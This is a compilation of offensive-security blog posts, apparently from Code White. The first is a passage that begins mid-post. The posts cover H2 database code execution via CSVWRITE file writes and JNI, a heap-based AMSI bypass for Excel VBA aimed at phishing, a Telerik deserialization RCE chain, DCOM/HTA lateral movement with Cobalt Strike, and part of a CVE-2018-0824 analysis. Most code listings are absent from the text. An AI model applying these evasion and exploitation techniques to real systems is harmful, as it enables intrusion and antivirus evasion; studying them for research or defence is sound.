So every public static method can be used. But in the worst case, only h2-1.2.141.jar and JRE are available. And additionally, only supported data types can be used for nested function calls. So, what is left?

While browsing the candidates in the Java runtime library rt.jar, the System.load(String) method stood out. It allows the loading of a native library. That would instantly allow code execution via the library's entry point function.

But how can the library be loaded to the H2 server? Although Java on Windows supports UNC paths and fetches the file, it refuses to actually load it. And this also won't work on Linux. So how can one write a file to the H2 server?

Writing arbitrary Files with H2

A brief look into the H2 functions reference shows that there is a FILE_WRITE function. Unfortunately, FILE_WRITE was introduced in 1.4.190. So we better only check those functions that are available in 1.2.141. The CSVWRITE function is the only one with "write" in its name.

A quick test showed that the CSV column header also gets printed. Looking at the CSV options showed that there is a writeColumnHeader option to disable writing the column header. Unfortunately, the writeColumnHeader option was only added with 1.3/1.4.177.

But while looking at the other supported options fieldSeparator, fieldDelimiter, escape, null, and lineSeparator, there came an idea: what if we blank them all out and use the CSV column header to write our data? And if the H2 database engine allows columns to have arbitrary names with arbitrary length, we ware be able to write arbitrary data.

Looking at H2's grammar for columns, the columnName of a column can be a quoted name, which is defined as:

" anything "
Quoted names are case sensitive, and can contain spaces. There is no maximum name length. Two double quotes can be used to create a single double quote inside an identifier.

That sounds almost perfect. So let's see if we can actually put anything in it and if CSVWRITE is binary-safe.

First, we generate our test data that covers all 8-bit octets:

$ python -c 'import sys;[sys.stdout.write(chr(i)) for i in range(0,256)]' > test.bin
$ sha1sum test.bin
4916d6bdb7f78e6803698cab32d1586ea457dfc8  test.bin

Now we generate a series of CHAR(n) function calls that will generate our binary data in the SQL query:

xxd -p -c 256 test.bin | sed -e 's/../),CHAR(0x&/g' -e 's/^),//' -e 's/$/)/' -e 's/CHAR(0x22)/&,&/g'

We then use it in the following CSVWRITE call:

SELECT CSVWRITE('C:\Windows\Temp\test.bin', CONCAT('SELECT NULL "', … , '"'), 'ISO-8859-1', '', '', '', '', '');

Finally, we test if the written file has the same checksum:

C:\Windows\Temp> certutil -hashfile test.bin SHA1
SHA1 hash of file test.bin:
49 16 d6 bd b7 f7 8e 68 03 69 8c ab 32 d1 58 6e a4 57 df c8
CertUtil: -hashfile command completed successfully.

So, the files seem to be identical!

Entering the native World

Now that we can write a native library to disk using the built-in function CSVWRITE and load it by creating an alias for System.load(String), we just could use the library's entry point to achieve code execution.

But let's take another it step further. Let's see if there is a way to execute arbitrary commands/code from SQL. Not just once the native library gets loaded, but as we like, possibly even with feedback that we can see in the H2 Console.

This is where the Java Native Interface (JNI) comes in. It allows the interaction between native code and the Java Virtual Machine (JVM). So in this case it would allow us to interact with JVM where the H2 Database is running.

The idea now is to use JNI to inject a custom Java class into the running JVM via ClassLoader.defineClass(byte[], int, int). That would allow us to create an alias and call it from SQL.

Calling into the JVM with JNI

First we need to get a handle to the running JVM. This can be done with the JNI_GetCreatedJavaVMs function. Then we attach the current thread to the VM and obtain a JNI interface pointer (JNIEnv). With that pointer we can interact with the JVM and call JNI functions such as FindClass, GetStaticMethodID/GetMethodID> and CallStatic<Type>Method/Call<Type>Method. The plan is to get the system class loader via ClassLoader.getSystemClassLoader() and call defineClass on it:

This basically mimics the following Java code:

The custom Java class JNIScriptEngine has just one single public static method that evaluates the passed script using an available ScriptEngine instance:

Finally, putting everything together:

That way we can execute arbitrary JavaScript code from SQL.

code white | Blog
Heap-based AMSI bypass for MS Excel VBA and othersDan
19 July 2019 at 12:03

Heap-based AMSI bypass for MS Excel VBA and others

code white | Blog

By: Dan

19 July 2019 at 12:03

This blog post describes how to bypass Microsoft's AMSI (Antimalware Scan Interface) in Excel using VBA (Visual Basic for Applications). In contrast to other bypasses this approach does not use hardcoded offsets or opcodes but identifies crucial data on the heap and modifies it. The idea of an heap-based bypass has been mentioned by other researchers before but at the time of writing this article no public PoC was available. This blog post will provide the reader with some insights into the AMSI implementation and a generic way to bypass it.

Introduction

Since Microsoft rolled out their AMSI implementation many writeups about bypassing the implemented mechanism have been released. Code White regularly conducts Red Team scenarios where phishing plays a great role. Phishing is often related to MS Office, in detail to malicious scripts written in VBA. As per Microsoft AMSI also covers VBA code placed into MS Office documents. This fact motivated some research performed earlier this year. It has been evaluated if and how AMSI can be defeated in an MS Office Excel environment.

In the past several different approaches have been published to bypass AMSI. The following links contain information which were used as inspiration or reference:

https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet also lists a lot of other writeups and implements a nice data-based approach
https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/ AMSI Bypass for VBA

The first article from the list above also mentions a heap-based approach. Independent from that writeup, Code White's approach used exactly that idea. During the time of writing this article there was no code publicly available which implements this idea. This was another motivation to write this blog post. Porting the bypass to MS Excel/VBA revealed some nice challenges which were to be solved. The following chapters show the evolution of Code White's implementation in a chronological way:

Implementing our own AMSI Client in C to have a debugging platform
Understanding how the AMSI API works
Bypassing AMSI in our own client
Porting this approach to VBA
Improving the bypass
Improving the bypass - making it production-ready

Implementing our own AMSI Client

In order to ease debugging we will implement our own small AMSI client in C which triggers a scan on the malicious string ‘amsiutils’. This string gets flagged as evil since some AMSI Bypasses of Matt Graeber used it. Scanning this simple string depicts a simple way to check if AMSI works at all and to verify if our bypass is functional. A ready-to-use AMSI client can be found on sinn3r's github . This code provided us a good starting point and also contained important hints, e.g. the pre-condition in the Local Group Policies.

We will implement our test client using Microsoft Visual Studio Community 2017. In a first step, we end up with two functions, amsiInit() and amsiScan(), not to be confused with functions exported by amsi.dll. Later we will add another function amsiByPass() which does what its name suggests. See this gist for the final code including the bypass.

Running the program generates the following output:

This means our ‘amsiutils’ is considered as evil. Now we can proceed working on our bypass.

Understanding AMSI Structures

As promised we would like to do a heap-based bypass. But why heap-based?

At first we have to understand that using the AMSI API requires initializing a so called AMSI Context (HAMSICONTEXT). This context must be initialized using the function AmsiInitialize(). Whenever we want to scan something, e.g. by calling AmsiScanBuffer(), we have to pass our context as first parameter. If the data behind this context is invalid the related AMSI functions will fail. This is what we are after, but let's talk about that later.
Having a look at HAMSICONTEXT we will see that this type gets resolved by the pre-processor to the following:

So what we got here is a pointer to a struct called ‘HAMSICONTEXT__’. Let's have a look where this pointer points to by printing the memory address of ‘amsiContext’ in our client. This will allow us to inspect its contents using windbg:

The variable itself is located at address 0x16a144 (note we have 32-bit program here) and its content is 0x16c8b10, that's where it points to. At address 0x16c8b10 we see some memory starting with the ASCII characters ‘AMSI’ identifying a valid AMSI context. The output below the memory field is derived via ‘!address’ which prints the memory layout of the current process.

There we can see that the address 0x16c8b10 is allocated to a region starting from 0x16c0000 to 0x16df0000 which is identified as Heap. Okay, that means AmsiInitialize() delivers us a pointer to a struct residing on the heap. A deeper look into AmsiInitialize() using IDA delivers some evidence for that:

The function allocates 16 bytes (10h) using the COM-specific API CoTaskMemAlloc(). The latter is intended to be an abstraction layer for the heap. See here and here for details. After allocating the buffer the Magic Word 0x49534D41 is written to the beginning of the block, which is nothing more than our ‘AMSI’ in ASCII.

It is noteworthy to say that an application cannot easily change this behavior. The content of the AMSI context will always be stored on the heap unless really sneaky things are done, like copying the context to somewhere else or implementing your own memory provider. This explains why Microsoft states in their API documentation, that the application is responsible to call AmsiUnitialize() when it is done with AMSI. This is because the client cannot (should not) free that memory and the process of cleaning up is performed by the AMSI library.

Now we have understood that

the AMSI Context is an important data structure
it is always placed on the heap
it always starts with the ASCII characters ‘AMSI’

In case our AMSI context is corrupt, functions like AmsiScanBuffer() will fail with a return value different from zero. But what does corrupt mean, how does AmsiScanBuffer() detect if the context is valid? Let's check that in IDA:

The function does what we already spoilered in the beginning: The first four bytes of the AMSI Context are compared against the value ‘0x49534D41’. If the comparison fails, the function returns with 0x80070057 which does not equal 0 and tells something went wrong.

Bypassing AMSI in our own AMSI Client

Our heap-based approach assumes several things to finally depict a so called bypass:

we have already code execution in the context of the AMSI client, e.g. by executing a VBA script
The AMSI client (e.g. Excel) initializes the AMSI context only once and reuses this for every AMSI operation
the AMSI client rates the checked payload in case of a failure of AmsiScanBuffer() as ‘not malicious

The first point is not true for our test client but also not required because it depicts only a test vehicle which we can modify as desired.

Especially the last point is important because we will try to mess up the one and only AMSI context available in the target process. If the failure of AmsiScanBuffer() leads to negative side effects, in worst case the program might crash, the bypass will not work.

So our task is to iterate through the heap of the AMSI client process, look for chunks starting with ‘AMSI’ and mess this block up making all further AMSI operations fail.

Microsoft provides a nice code example which walks through the heap using a couple of functions from kernel32.dll.

Due to the fact that all the required information is present in user space one could do this task by parsing data structures in memory. Doing so would make the use of external functions obsolete but probably blow up our code so we decided to use the functions from the example above.

After cutting the example down to the minimum functionality we need, we end up with a function amsiByPass().

So this code retrieves the heap of the current process, iterates through it and looks at every chunk tagged as 'busy'. Within these busy chunks we check if the first bytes match our magic pattern ‘AMSI’ and if so overwrite it with some garbage.

The expectation is now that our payload is no longer flagged as malicious but the AmsiScanBuffer() function should return with a failure. Let's check that:

Okay, that's exactly what we expected. Are we done? No, not yet as we promised to provide an AMSI bypass for EXCEL/VBA so let's move on..

Bypassing AMSI in Excel using VBA

Now we will dive into the strange world of VBA. We used Microsoft Excel for Office 365 MSO (16.0.11727.20222) 32-bit for our testing.

After having written a basic POC in C we have to port this POC to VBA. VBA supports importing arbitrary external functions from DLLs so using our Heap APIs should be no problem. As far as we understood VBA, it does not allow pointer arithmetic or direct memory access. This problem can be resolved by importing a function which allows copying data from arbitrary memory locations into VBA variables. A very common function to perform this task is RtlMoveMemory().

After some code fiddling we came up with the following code.

As you can see we put some time measurement around the main loop. The number of rounds the loop may take can be several hundred thousand iterations and in addition with the poor VBA performance we expected a significant amount of time the bypass will take. Time is a crucial thing in a real attack scenario. If our phishing victim opens a malicious Excel sheet it is not acceptable that the embedded script blocks the execution for let's say more than one or two seconds. At least after 5 seconds of perceived unresponsiveness of the application a human will get impatient and do things like trying to close Excel, which is not what we want.

So let's see how long the bypass will take. To be honest, we did not expect what was happening. The result was difficult to reproduce but the measured runtime varied from 15 minutes to endless. In some rare cases Excel was closed after some minutes without any further notice. This was probably because it was unresponsive for too long. However, this isn't really something we can use in a real scenario.

Okay so what went wrong here? Is VBA really that slow? Yes, it is some orders of magnitude slower than our C code, but that does not explain what we experienced. Microsoft gives some internal details on how AMSI is implemented in Excel. It turns out that Excel uses another strategy as e.g. PowerShell does. The latter more or less sends the whole script to AmsiScanBuffer(). Excel implements a little smarter approach which is based on so called triggers. Microsoft considers pure VBA code to be harmless until the point when imports come into play. That's exactly what we do - importing functions from external DLLs. Some of these imports are treated as potentially dangerous and their call including all parameters are put into a ring buffer which is sent to AMSI. This gives AV solutions like MS defender the opportunity to check data behind addresses which of course makes sense. Let's see what data is sent to the AMSI API in our explicit case by breaking on AmsiScanBuffer using windbg:

As we can see the ring buffer contains all functions we imported including their parameter values. Our Windows 10 System has MS Defender installed and activated. So every call to AmsiScanBuffer() will bother our friend MS Defender. AMSI is implemented as In-process COM in the first place. But to finally communicate with other AV solutions it has to transport data out of process and perform a context switch. This can be seen on the next architecture overview provided by MS:

Source: https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps

The little green block on the bottom of the figure shows that our process (Excel) indirectly communicates via rpc with Defender. Hmm... Okay so this is done several 100k times, which is just too much and explains the long runtime. To provide some more evidence we repeat the bypass with Defender switched off, which should significantly speed up our bypass. In addition to that we monitor the amount of calls to AmsiScanBuffer() so we can get an impression how often it is called.

The same loop with Defender disabled took something between one and two minutes:

In a separate run we check the amount of calls to AmsiScanBuffer() using windbg:

AmsiScanBuffer() is called 124624 times (0x10000000 - 0xffe1930) which is roughly the amount of iterations our loop did. That's a lot and underlines our assumptions that AMSI is just called very often. So we understood what is going on, but currently there seems no workaround available to solve our runtime problem.

Giving up now? Not yet...

Improving AMSI Bypass in Excel

As described in the chapter above our current approach is much too slow to be used in a real scenario. So what can we do to improve this situation?

One of the functions we imported is RtlMoveMemory() which is as mentioned earlier used by a lot of malware. Monitoring this function would make a lot of sense and it might be considered as trigger. Let's verify that by just removing the call to CopyMem (the alias for RtlMoveMemory) and see what happens. This prevents our bypass from working but it might give us some insight.

The runtime is now at 0.8 seconds. Wow okay, this really made a change. It shall be noted that in this configuration we even walk through the whole heap. Due to the missing call to RtlMoveMemory() we will not find our pattern.

After we identified our bottleneck, what can we do? We will have to find an alternative method to access raw memory which is not treated as trigger by Excel. Some random Googling revealed the following function: CryptBinaryToStringA() which is part of crypt32.dll. The latter should be present on most Windows systems and thus it should be okay to import it.

The function is intended to convert strings from one format to another but it can also be used to just simply copy bytes from an arbitrary memory position we specify. Cool, that's exactly what we are after! In order to abuse this function for our purpose we call it like that to read the lpData field from the Process Heap Entry structure:

The input parameter from left to right explained:

phe.lpData is the source we want to copy data from,
ByVal 4 is the length of bytes we want to copy (lpData is 32-bit on our 32-bit Excel)
ByVal 2 means we want to copy raw binary (CRYPT_STRING_BINARY)
ByVal VarPtr(magicWord) is the target we want to copy that memory to (our VBA variable magicWord)
the last parameter (ByVal VarPtr(bytesWritten)) tells us how many bytes were really copied

So let's replace all occurrences of RtlMoveMemory() with CryptBinaryToStringA() and check again how long our bypass takes. You can find an updated version of the source code right here.

Our loop now takes about four seconds to finish, that is still much but it finished and it told us that it found the pattern we are looking after. Let's see how many times Excel calls AmsiScanBuffer() now with this version:

Oh my... Excel did not call AmsiScanBuffer() at all. So this means as long as there is no trigger in our code, nothing is sent to AMSI. Or the other way around: As soon as we use one single trigger function, Excel will send all calls to AMSI. Good to know...

This is the first time we can really verify if the bypass works. So let's look for some code which triggers AMSI from VBA. Iliya Dafchev shows some port of an older AMSI Bypass to VBA which gets flagged by AMSI itself in the first place. Perfect, we will put this code into a function called triggerAMSI() and use it as positive test:

After running it Excel complains as expected with a warning and just closes our current instance of Excel:

AMSI Alert by Excel - sorry for the German!

Putting our bypass and our positive test together we get the following function:

Hopes are high, that the message box containing “we survived” gets displayed because we killed AMSI before triggering it.

Great, our bypass seems to work. So let's put this into our real phishing campaign. Uhm.. just wait, how long did the whole thing take? four seconds? Repeated execution of the bypass even showed runtimes greater than ten seconds. Oh no, this is still too much.

Giving up now? Not yet...

Improving AMSI Bypass in Excel - continued

In the last chapter we improved our AMSI bypass from infinite runtime to ten seconds or below. This seems to be still too much for a real campaign (our opinion). So what can we do to speed up the whole thing one more time?

The loop takes some 100k iterations which is done in C in no time. Defender is completely out of the game. So our current runtime seems to be a pure result of the bad VBA performance. To be fair, these kind of things we are currently trying to do are not a typical VBA task so let's blame us instead of Excel for doing crazy stuff...

Anyway, what can we do now? Programming C in VBA is not an option, but what about invoking some shellcode? As long as we can import arbitrary functions the execution of shellcode should not be a problem. This code snippet shows an example how to do that within VBA. The next step is converting our VBA code (or more our initial C code) into assembly language, that is, into shellcode.

Everyone who ever wrote some pieces of shellcode and wanted to call functions from DLLs knows that the absolute addresses of these functions are not known during the time the shellcode gets assembled. This means we have to implement a mechanism like GetProcAddress() to lookup the addresses of required functions during runtime. How to do this without any library support is well understood and extensively documented so we will not go into details here. Implementing this part of the shellcode is left as an excercise for the reader.

Of course there are many ready to use code snippets which should do the job, but we decided to implement the shellcode on our own. Why? Because it is fun and self written shellcode should be unlikely to get caught by AV solutions.

The main loop of our AMSI bypass in assembly can be found here.

The structure ShellCodeEnvironment holds some important information like the looked up address of our HeapWalk() and GetProcessHeaps() function. The rest of the loop should be straight forward...

So putting everything together we generate our shellcode, put it into our VBA code and start it from there as new thread. Of course we measure the runtime again:

This time it is only 0.02 seconds!

We think this result is more than acceptable. The runtime may vary depending on the processor load or the total heap size but it should be significantly below one second which was our initial goal.

Summary

We hope you enjoyed reading this blog post. We showed the feasibility of a heap-based AMSI bypass for VBA. The same approach, with slight adaptions, also works for PowerShell and .Net 4.8. The latter also comes with AMSI support integrated in its Common Language Runtime. As per Microsoft AMSI is not a security boundary so we do not expect that much reaction but are still curious if MS will develop some detection mechanisms for this idea.

Telerik Revisited

code white | Blog

By: Markus Wulftange

7 February 2019 at 10:04

In 2017, several vulnerabilities were discovered in Telerik UI, a popular UI component library for .NET web applications. Although details and working exploits are public, it often proves to be a good idea to take a closer look at it. Because sometimes it allows you to explore new avenues of exploitation.

Introduction

Telerik UI for ASP.NET is a popular UI component library for ASP.NET web applications. In 2017, several vulnerabilities were discovered, potentially resulting in remote code execution:

CVE-2017-9248: Cryptographic Weakness: A cryptographic weakness allows the disclosure of the encryption key (Telerik.Web.UI.DialogParametersEncryptionKey and/or the MachineKey) used to protect the DialogParameters via an oracle attack. It can be exploited to forge a functional file manager dialog and upload arbitrary files and/or compromise the ASP.NET ViewState in case of the latter.
CVE-2017-11317: Hard-coded default key: A hard-coded default key is used to encrypt/decrypt the AsyncUploadConfiguration, which holds the path where uploaded files are stored temporarily. It can be exploited to upload files to arbitrary locations.
CVE-2017-11357: Insecure Direct Object Reference: The name of the file stored in the location specified in AsyncUploadConfiguration is taken from the request and thus allows the upload of files with arbitrary extension.

The vulnerabilities were fixed in R2 2017 SP1 (2017.2.621) and R2 2017 SP2 (2017.2.711), respectively. As for CVE-2017-9248, there is an analysis by PatchAdvisor^[1] that gives some insights and exploitation hints. And regarding CVE-2017-11317, the detailed writeup by @straight_blast seems to have been published even half a year before Telerik published an updated version. It describes in detail how the vulnerability was discovered and how it can be exploited to upload an arbitrary file to an arbitrary location. If you're unfamiliar with these vulnerabilities, you may want to read the linked advisories first to get a better understanding.

The Catch

Although the vulnerabilities sound promising, they all have their catch: exploiting CVE-2017-9248 requires many thousands of requests, which can be pretty noticeable and suspicious. And unless it is actually possible to leak the MachineKey (which would allow an exploitation via deserialization of arbitrary ObjectStateFormatter stream), a file upload to an arbitrary location (i. e., CVE-2017-11317) is still limited to the knowledge of an appropriate location with sufficient write permissions.

The problem here is that by default the account that the IIS worker process w3wp.exe runs with is a special account like IIS AppPool\DefaultAppPool. And such an account usually does not have write permissions to the web document root directory like C:\inetpub\wwwroot or similar. Additionally, the web document root of the web application can also be somewhere else and may not be known. So simply writing an ASP.NET web shell probably won't work in many cases.

The Dead End

This was exactly the case when we faced Managed Workplace RMM by Avast Business in a red team assessment where we didn't want to make too much noise. Additionally, unauthenticated access to all *.aspx pages except for Login.aspx was denied, i. e., the handler Telerik.Web.UI.DialogHandler.aspx for exploiting CVE-2017-9248 was not reachable, and the other one, Telerik.Web.UI.SpellCheckHandler.axd, was not registered. So, CVE-2017-11317 seemed to be the only option left.

By enumerating known versions of Telerik Web UI, one request to upload to C:\Windows\Temp was finally successful. But an upload to C:\inetpub\wwwroot did not succeed. And since we did not have access to an installation of Managed Workplace, we had no insights into its directory structure. So this seemed to be a dead end.

The New Avenue

While tracing the path of the provided rauPostData through the Telerik code, there was one aspect that became apparent that was never mentioned before by anyone else: The exploitation of CVE-2017-11317 was always advertised as an arbitrary upload. This seems obvious as the handler's name is AsyncUploadHandler and rauPostData contains the upload configuration.

But after taking a closer look at the code that processes the rauPostData, it showed that the rauPostData is expected to consist of two parts separated by a &.

// Telerik.Web.UI.AsyncUpload.SerializationService
internal static object Deserialize(string obj, Type type)
{
JavaScriptSerializer serializer = SerializationService.GetSerializer(obj.Length);
SerializationService.ApplyConverters(type, serializer);
MethodInfo methodInfo = typeof(JavaScriptSerializer).GetMethod("Deserialize", new Type[]
{
typeof(string)
}, null).MakeGenericMethod(new Type[]
{
type
});
return methodInfo.Invoke(serializer, new object[]
{
obj
});
}

The first part is the JSON data (line 9). And the second part is the assembly qualified type name (line 10) that the JSON data should be deserialize to. The call in line 11 then ends up in SerializationService.Deserialize(string, Type).

// Telerik.Web.UI.AsyncUploadHandler
internal IAsyncUploadConfiguration GetConfiguration(string rawData)
{
string[] array = rawData.Split(new char[]
{
'&'
});
string obj = array[0];
Type type = Type.GetType(CryptoService.GetService().Decrypt(array[1]));
IAsyncUploadConfiguration asyncUploadConfiguration = (IAsyncUploadConfiguration)SerializationService.Deserialize(obj, type, true);
if (!this.IsValidHMac(asyncUploadConfiguration.TargetFolder) || !this.IsValidHMac(asyncUploadConfiguration.TempTargetFolder))
{
throw new CryptographicException("The hash is not valid!");
}
asyncUploadConfiguration.TargetFolder = AsyncUploadHandler.DecryptFolder(this.GetEncryptedText(asyncUploadConfiguration.TargetFolder));
asyncUploadConfiguration.TempTargetFolder = AsyncUploadHandler.DecryptFolder(this.GetEncryptedText(asyncUploadConfiguration.TempTargetFolder));
return asyncUploadConfiguration;
}

Here a JavaScriptSerializer gets parameterized with the type provided in the rauPostData. That means this is an arbitrary JavaScriptSerializer deserialization!

From the research Friday the 13^th JSON Attacks by Alvaro Muñoz & Oleksandr Mirosh it is known that arbitrary JavaScriptSerializer deserialization can be harmful if the expected type can be specified by the attacker. During deserialization, appropriate setter methods get called. A suitable gadget is the System.Configuration.Install.AssemblyInstaller, which allows the loading of a DLL by specifying its path. If the DLL is a mixed mode assembly, its DllMain() entry point gets called on load, which allows the execution of arbitrary code in the context of the w3wp.exe process.

This allowed the remote code execution on Managed Workplace without authentication. The issue has been addressed and should be fixed in Managed Workplace 11 SP4 MR2.

Conclusion

So CVE-2017-11317 can be exploited even without the requirement of being able to write to the web document root:

Upload a mixed mode assembly DLL to a writable location using the regular AsyncUploadConfiguration exploit.
Load the uploaded DLL and thereby trigger its DllMain() function using the AssemblyInstaller exploit described above.

This is an excellent example that revisiting old vulnerabilities can be worthwhile and result in new ways out of a supposed dead end.

[1] The original blog post was deleted. But, you know, the Internet never forgets. ;)

code white | Blog
LethalHTA - A new lateral movement technique using DCOM and HTAUnknown
6 July 2018 at 12:08

LethalHTA - A new lateral movement technique using DCOM and HTA

code white | Blog

By: Unknown

6 July 2018 at 12:08

The following blog post introduces a new lateral movement technique that combines the power of DCOM and HTA. The research on this technique is partly an outcome of our recent research efforts on COM Marshalling: Marshalling to SYSTEM - An analysis of CVE-2018-0824.

Previous Work

Several lateral movement techniques using DCOM were discovered in the past by Matt Nelson, Ryan Hanson, Philip Tsukerman and @bohops. A good overview of all the known techniques can be found in the blog post by Philip Tsukerman. Most of the existing techniques execute commands via ShellExecute(Ex). Some COM objects provided by Microsoft Office allow you to execute script code (e.g VBScript) which makes detection and forensics even harder.

LethalHTA

LethalHTA is based on a very well-known COM object that was used in all the Office Moniker attacks in the past (see FireEye's blog post):

ProgID: "htafile"
CLSID : "{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}"
AppID : "{40AEEAB6-8FDA-41E3-9A5F-8350D4CFCA91}"

Using James Forshaw's OleViewDotNet we get some details on the COM object. The COM object runs as local server.

It has an App ID and default launch and access permissions. Only COM objects having an App ID can be used for lateral movement.

It also implements various interfaces as we can see from OleViewDotNet.

One of the interfaces is IPersistMoniker. This interface is used to save/restore a COM object's state to/from an IMoniker instance.

Our initial plan was to create the COM object and restore its state by calling the IPersistMoniker->Load() method with a URLMoniker pointing to an HTA file. So we created a small program and run it in VisualStudio.

But calling IPersistMoniker->Load() returned an error code 0x80070057. After some debugging we realized that the error code came from a call to CUrlMon::GetMarshalSizeMax(). That method is called during custom marshalling of a URLMoniker. This makes perfect sense since we called IPersistMoniker->Load() with a URLMoniker as a parameter. Since we do a method call on a remote COM object the parameters need to get (custom) marshalled and sent over RPC to the RPC endpoint of the COM server.

So looking at the implementation of CUrlMon::GetMarshalSizeMax() in IDA Pro we can see a call to CUrlMon::ValidateMarshalParams() at the very beginning.

At the very end of this function we can find the error code set as return value of the function. Microsoft is validating the dwDestContext parameter. If the parameter is MSHCTX_DIFFERENTMACHINE (0x2) then we eventually reach the error code.

As we can see from the references to CUrlMon::ValidateMarshalParams() the method is called from several functions during marshalling.

In order to bypass the validation we can take the same approach as described in our last blog post: Creating a fake object. The fake object needs to implement IMarshal and IMoniker. It forwards all calls to the URLMoniker instance. To bypass the validation the implementation methods for CUrlMon::GetMarshalSizeMax, CUrlMon::GetUnmarshalClass, CUrlMon::MarshalInterface need to modify the dwDestContext parameter to MSHCTX_NOSHAREDMEM(0x1). The implementation for CUrlMon::GetMarshalSizeMax() is shown in the following code snippet.

And that's all we need to bypass the validation. Of course we could also patch the code in urlmon.dll. But that would require us to call VirtualProtect() to make the page writable and modify CUrlMon::ValidateMarshalParams() to always return zero. Calling VirtualProtect() might get caught by EDR or "advanced" AV products so we wouldn't recommend it.

Now we are able to call the IPersistMoniker->Load() on the remote COM object. The COM object implemented in mshta.exe will load the HTA file from the URL and evaluate its content. As you already know the HTA file can contain script code such as JScript or VBScript. You can even combine our technique with James Forshaw's DotNetToJScript to run your payload directly from memory!

It should be noted that the file doesn't necessarily need to have the hta file extension. Extensions such as html, txt, rtf work fine as well as no extension at all.

LethalHTA and LethalHTADotNet

We created implementations of our technique in C++ and C#. You can run them as standalone programms. The C++ version is more a proof-of-concept and might help you creating a reflective DLL from it. The C# version can also be loaded as an Assembly with Assembly.Load(Byte[]) which makes it easy to use it in a Powershell script. You can find both implementations under releases on our GitHub.

CobaltStrike Integration

To be able to easily use this technique in our day-to-day work we created a Cobalt Strike Aggressor Script called LethalHTA.cna that integrates the .NET implementation (LethalHTADotNet) into Cobalt Strike by providing two distinct methods for lateral movement that are integrated into the GUI, named HTA PowerShell Delivery (staged - x86) and HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic)

The HTA PowerShell Delivery method allows to execute a PowerShell based, staged beacon on the target system. Since the PowerShell beacon is staged, the target systems need to be able to reach the HTTP(S) host and TeamServer (which are in most cases on the same system).

The HTA .NET In-Memory Delivery takes the technique a step further by implementing a memory-only solution that provides far more flexibility in terms of payload delivery and stealth. Using the this option it is possible to tunnel the HTA delivery/retrieval process through the beacon and also to specify a proxy server. If the target system is not able to reach the TeamServer or any other Internet-connected system, an SMB listener can be used instead. This allows to reach systems deep inside the network by bootstrapping an SMB beacon on the target and connecting to it via named pipe from one of the internal beacons.

Due to the techniques used, everything is done within the mshta.exe process without creating additional processes.

The combination of two techniques, in addition to the HTA attack vector described above, is used to execute everything in-memory. Utilizing DotNetToJScript, we are able to load a small .NET class (SCLoader) that dynamically determines the processes architecture (x86 or x64) and then executes the included stageless beacon shellcode. This technique can also be re-used in other scenarios where it is not apparent which architecture is used before exploitation.

For a detailed explanation of the steps involved visit our GitHub Project.

Detection

To detect our technique you can watch for files inside the INetCache (%windir%\[System32 or SysWOW64]\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\) folder containing "ActiveXObject". This is due to mshta.exe caching the payload file. Furthermore it can be detected by an mshta.exe process spawned by svchost.exe.

code white | Blog
Marshalling to SYSTEM - An analysis of CVE-2018-0824Unknown
15 June 2018 at 13:19

Marshalling to SYSTEM - An analysis of CVE-2018-0824

code white | Blog

By: Unknown

15 June 2018 at 13:19

In May 2018 Microsoft patched an interesting vulnerability (CVE-2018-0824) which was reported by Nicolas Joly of Microsoft's MSRC:

A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects. An attacker who successfully exploited the vulnerability could use a specially crafted file or script to perform actions. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file. The security update addresses the vulnerability by correcting how "Microsoft COM for Windows" handles serialized objects.

The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.

Before I go into details I want to give you a quick introduction into COM and how deserialization/marshalling works. As I'm far from being an expert on COM, all this information is either based on the great book "Essential COM" by Don Box or the awesome Infiltrate '17 Talk "COM in 60 seconds". I have skipped several details (IDL/MIDL, Apartments, Standard Marshalling, etc.) just to keep the introduction short.

Introduction to COM and Marshalling

COM (Component Object Model) is a Windows middleware having reusable code (=component) as a primary goal. In order to develop reusable C++ code, Microsoft engineers designed COM in an object-oriented manner having the following key aspects in mind:

Portability
Encapsulation
Polymorphism
Separation of interfaces from implementation
Object extensibility
Resource Management
Language independence

COM objects are defined by an interface and implementation class. Both interface and implementation class are identified by a GUID. A COM object can implement several interfaces using inheritance.
All COM objects implement the IUnknown interface which looks like the following class definition in C++:

The QueryInterface() method is used to cast a COM object to a different interface implemented by the COM object. The AddRef() and Release() methods are used for reference counting.

Just to keep it short I rather go on with an existing COM object instead of creating an artificial example COM object. A Control Panel COM object is identified by the GUID {06622D85-6856-4460-8DE1-A81921B41C4B}. To find out more about the COM object we could analyze the registry manually or just use the great tool "OleView .NET".

The "Control Panel" COM object implements several interfaces as we can see in the screenshot of OleView .NET: The implementation class of the COM object (COpenControlPanel) can be found in shell32.dll. To open a "Control Panel" programmatically we make use of the COM API:

In line 6 we initialize the COM environment
In line 7 we create an instance of a "Control Panel" object
In line 8 we cast the instance to the IOpenControlPanel interface
In line 9 we open the "Control Panel" by calling the "Open" method

Inspecting the COM object in the debugger after running until line 9 shows us the virtual function table (vTable) of the object:

The function pointers in the vTable of the object point to the actual implementation functions in shell32.dll. The reason for that is that the COM object was created as a so called InProc server which means that shell32.dll got loaded into the current process address space. When passing CLSCTX_ALL, CoCreateInstance() tries to create an InProc server first. If it fails, other activation methods are tried (see CLSCTX enumeration).

By changing the CLSCTX_ALL parameter to function CoCreateInstance() to CLSCTX_LOCAL_SERVER and running the program again we can notice some differences: The vTable of the object contains now function pointers from the OneCoreUAPCommonProxyStub.dll. And the 4th function pointer which corresponds to the Open()" method now points to OneCoreUAPCommonProxyStub!ObjectStublessClient3().

The reason for that is that we created the COM object as an out-of-process server. The following diagram tries to give you an architectural overview (shamelessly borrowed from Project Zero):

